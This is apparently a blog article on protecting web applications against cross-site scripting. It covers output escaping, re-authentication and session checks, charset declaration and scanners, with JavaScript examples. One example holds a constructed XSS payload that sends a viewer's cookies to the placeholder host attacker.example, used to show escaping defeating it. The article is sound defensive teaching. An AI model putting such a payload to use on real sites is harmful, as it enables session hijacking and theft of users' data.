There are many benefits to creating web applications for your business. Compared to traditional websites they are extremely versatile and attractive; having only static content in this day and age makes you look like a dinosaur. Security, on the other hand, isn't guaranteed, and it is a concern many businesses would do well to take more seriously when constructing web apps: the same things that make them powerful (accepting input, storing it, and showing it to other users) also act as a bridge for attackers.
When building a web application, it’s essential that you understand the variety of ways in which an attacker can harm you through it. You only need to miss one vulnerability to experience a data breach.
I'd strongly recommend you take a look at the OWASP Top 10, published by the Open Web Application Security Project, a nonprofit that ranks the ten most critical security risks for web applications. The list is revised every few years; in the 2017 edition Cross-Site Scripting is item A7.
There's plenty of research to be done surrounding web application security, but you don't always have time to do the research yourself. Therefore, it's a good idea to have a penetration tester on board. When you want to find out which security concerns leave you most at risk, it's important to identify them at the source: penetration testers are tasked with finding the security weaknesses specific to your application and business, rather than the generic ones a checklist covers.
If you’re a startup and don’t have the ability to hire a specialist security testing role, ensure your developer or programmer sets adequate time aside for security concerns.
What Security Issue is Leaving Organizations Most Vulnerable?
In the past, many companies would understandably keep any information about breaches private. This kept reputations intact, but wasn’t the best way forward for identifying security threats, namely what was leaving organizations vulnerable. If you get burgled, the neighbourhood needs to know about it!
These days, things are better: bug-bounty platforms and shared vulnerability databases collect reports at scale, which shows us the most common security concerns and which remediation steps have worked and which haven't.
An issue relating to web applications that reappears again and again is cross-site scripting (XSS). XSS doesn't get the attention it deserves because it rarely shows up as a large company data breach on its own. Instead, it uses the company's web app as a springboard to attack its end users. Each individual attack yields less for the attacker, but it can be carried out against far more targets. It's a flurry of blows rather than a single king hit, but it'll take you down just as effectively: if your users get hacked because of your site, they'll be understandably furious with you and you'll bleed users.
Understanding Cross-Site Scripting in Web Applications
Cross-site scripting in web applications takes place when malicious code is injected into a benign website through a vulnerability in the web application, a plugin, or the web server hosting it. A common XSS attack vector is a developer forgetting to escape the contents of a comments field before writing it into the page; this lets an attacker submit a comment containing a <script> tag, which then runs in the browser of every user who loads the page.
These attacks are particularly nasty because of how the Same Origin Policy works: the injected script executes within your site's origin, so the browser treats it as your code, regardless of who actually wrote it. The policy that normally keeps other sites' scripts away from your pages offers no protection here. Script that runs in your origin can read the page, read the site's cookies (unless they are marked HttpOnly), and send requests that carry the victim's session. In the comment example, an attacker who puts malicious code into a comment gets it run in the browser of everyone who views that comment, letting them steal session data and act on the site as the victim: reading their personal information, say, or making purchases in their name.
Really, anywhere user-supplied data reaches a page without proper output encoding is vulnerable to this sort of injection, though there are a few big areas we're going to go over to help you really lock things down.
- Proper Escape Syntax
You can shut down the large majority of web app XSS attacks by making sure you escape correctly. You'll want to do this with ANY user-supplied data, and the place to do it is where that data is written into the page, not just where it arrives.
How you do that depends a lot on your codebase and, more importantly, on where the data ends up. In an HTML body or attribute, the characters that need encoding are &, <, >, " and ', and most templating engines do this for you if you let them. When user data goes into a URL query string, encodeURIComponent() is the right tool: it replaces reserved characters with percent-encoded escape sequences so the value cannot break out of the parameter. Don't use it as a substitute for HTML escaping, though; it solves a different context. In the browser, prefer assigning user text to an element's textContent over building markup with innerHTML.
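The following is an added example, not code from the original article: it renders the same comment the unsafe way and the encoded way, and shows encodeURIComponent() used for the URL context it is meant for. The payload is a constructed attacker comment, and the attacker.example hostname is a placeholder.

```javascript
// Added example (not from the original article): one comment rendered two ways,
// plus the URL-context encoder. Plain Node.js, no DOM required.

// HTML-entity encoder for text placed in the HTML body or in a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the stored comment is concatenated straight into markup, so a
// comment containing a <script> tag becomes live script for every viewer.
function renderCommentUnsafe(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Hardened: identical markup, but the comment is encoded for the HTML context
// at the moment it is written into the page.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// URL context: encodeURIComponent() is the right encoder when user data goes
// into a query-string value. It is not an HTML encoder; use it for this only.
function profileLink(username) {
  return `/profile?user=${encodeURIComponent(username)}`;
}

// Crude check used to show whether a rendered string still carries a live tag.
function containsTag(html, tagName) {
  return new RegExp(`<${tagName}[\\s>]`, 'i').test(html);
}

// Constructed attacker comment (not a real incident): sends the viewer's cookies
// to a placeholder host.
const PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

console.log(renderCommentUnsafe(PAYLOAD)); // <script> survives: runs in every viewer's browser
console.log(renderCommentSafe(PAYLOAD));   // &lt;script&gt;...: displayed as text, never executed
console.log(profileLink('a&b="c"'));       // /profile?user=a%26b%3D%22c%22
```

Note that encodeURIComponent() happens to percent-encode < and > as well, which is why it sometimes appears to "work" for HTML; the output is still wrong for that context (the user sees %3C instead of <), and it does nothing for attribute or JavaScript contexts. Pick the encoder for the context the data lands in.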
- Crossing Boundaries Policy
A "crossing boundaries policy" forces users to re-enter their login details when moving to a page that contains sensitive information or performs a sensitive action, even if they hold a valid session cookie. This extra step limits what an attacker can do with a hijacked session. To reinforce it, you can also terminate a session outright if requests for it arrive from two different IP addresses. Two caveats: the IP check misfires for mobile users and for offices behind a shared NAT address, and neither control stops an attack in which the injected script issues requests directly from the victim's own browser, because those requests come from the victim's IP with the victim's cookies. Marking the session cookie HttpOnly at least keeps the cookie value itself out of the script's reach.
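The following is an added example, not the article's own code: a minimal in-memory session store that implements the two controls just described, a freshness check before sensitive pages and termination of a session seen from a second IP address. The class and method names, the five-minute re-authentication window and the IP addresses are assumptions for illustration.

```javascript
// Added example (not from the original article): in-memory session store with
// re-authentication for sensitive pages and IP-change termination.
// The five-minute window and all names/addresses below are illustrative assumptions.

const REAUTH_WINDOW_MS = 5 * 60 * 1000; // how recent a login must be for a sensitive page

class SessionStore {
  constructor() {
    this.sessions = new Map(); // sessionId -> { userId, ip, lastAuthAt, terminated }
  }

  // Called at login: bind the new session to the client IP seen at login time.
  create(sessionId, userId, ip, now) {
    this.sessions.set(sessionId, { userId, ip, lastAuthAt: now, terminated: false });
  }

  // Called on every request. Returns the session record if the cookie is still
  // good, or null. A request from a second IP terminates the session for everyone,
  // not just the request that tripped the check.
  validate(sessionId, ip) {
    const s = this.sessions.get(sessionId);
    if (!s || s.terminated) return null;
    if (s.ip !== ip) {
      s.terminated = true; // possible hijack: kill the session
      return null;
    }
    return s;
  }

  // Crossing-boundaries check: a sensitive page needs a login within the window,
  // even though the session cookie itself is still valid.
  needsReauth(sessionId, now) {
    const s = this.sessions.get(sessionId);
    if (!s || s.terminated) return true;
    return now - s.lastAuthAt > REAUTH_WINDOW_MS;
  }

  // Called after the user successfully re-enters their credentials.
  recordReauth(sessionId, now) {
    const s = this.sessions.get(sessionId);
    if (s && !s.terminated) s.lastAuthAt = now;
  }
}

// Walk through the scenario with constructed values and return what each step decided.
function scenario() {
  const store = new SessionStore();
  const t0 = 1700000000000; // arbitrary epoch milliseconds
  const MIN = 60 * 1000;
  store.create('sid-1', 'alice', '203.0.113.10', t0);

  const results = {};
  results.normalRequest = store.validate('sid-1', '203.0.113.10') !== null;
  results.sensitiveFresh = store.needsReauth('sid-1', t0 + 1 * MIN);   // logged in a minute ago
  results.sensitiveStale = store.needsReauth('sid-1', t0 + 10 * MIN);  // ten minutes: ask again
  store.recordReauth('sid-1', t0 + 10 * MIN);
  results.sensitiveAfterReauth = store.needsReauth('sid-1', t0 + 11 * MIN);
  // Stolen cookie replayed from the attacker's address: the session is terminated...
  results.hijackAccepted = store.validate('sid-1', '198.51.100.7') !== null;
  // ...so the legitimate user is logged out as well and must sign in again.
  results.victimStillValid = store.validate('sid-1', '203.0.113.10') !== null;
  return results;
}

console.log(scenario());
```

The last two steps are the trade-off to weigh before enabling the IP check: it catches a token that has been exfiltrated and replayed from elsewhere, but a user whose phone switches from Wi-Fi to mobile data will be logged out the same way, and script running in the victim's own tab never trips it at all.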
- Limit Injection Possibility With the Right Meta Tag
If a page doesn't declare its character encoding, the browser has to guess one, and some servers won't send a charset parameter in the Content-Type header at all. The charset determines how the bytes of your page are interpreted, and therefore which byte sequences can turn into markup. Declaring it explicitly narrows what an injected payload can do, because it takes the guessing away. For example, the following meta tag fixes the charset to ISO-8859-1:
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
ISO-8859-1 covers most Western European languages; for anything else, and for new sites generally, declare UTF-8 instead, and send the same value in the Content-Type response header so the two never disagree. Attackers have historically relied on a browser guessing an unusual encoding so that bytes your filter considered harmless were decoded as a <script> tag; an explicit charset closes off that particular trick. It is a supporting control, though, not a substitute for output encoding.
- Vulnerability Scanning Tools
An option for those with less of a technical background is installing a vulnerability scanning tool. Such tools scan for cross-site scripting vulnerabilities as well as a range of other security issues such as path traversal, command injection and SQL injection. There are plenty to choose from; some are free and others are subscription services that offer more thorough scanning. Bear in mind that a scanner finds the patterns it knows about, so treat it as a complement to a penetration test and to careful output encoding, not a replacement for them.
Security should be a top priority in your web application and website. Complacency with security puts you and your users at risk and can result in serious financial or reputational consequences. XSS may not grab headlines the way SQL injection did a decade ago, but it is still common and still devastating for the users it hits, and it needs to be taken seriously.
Of course, security is important in any development project, and XSS attacks primarily damage your users and bounce the harm back onto you indirectly. But you also need to protect yourself from malicious intent; in doing so you are protecting your business.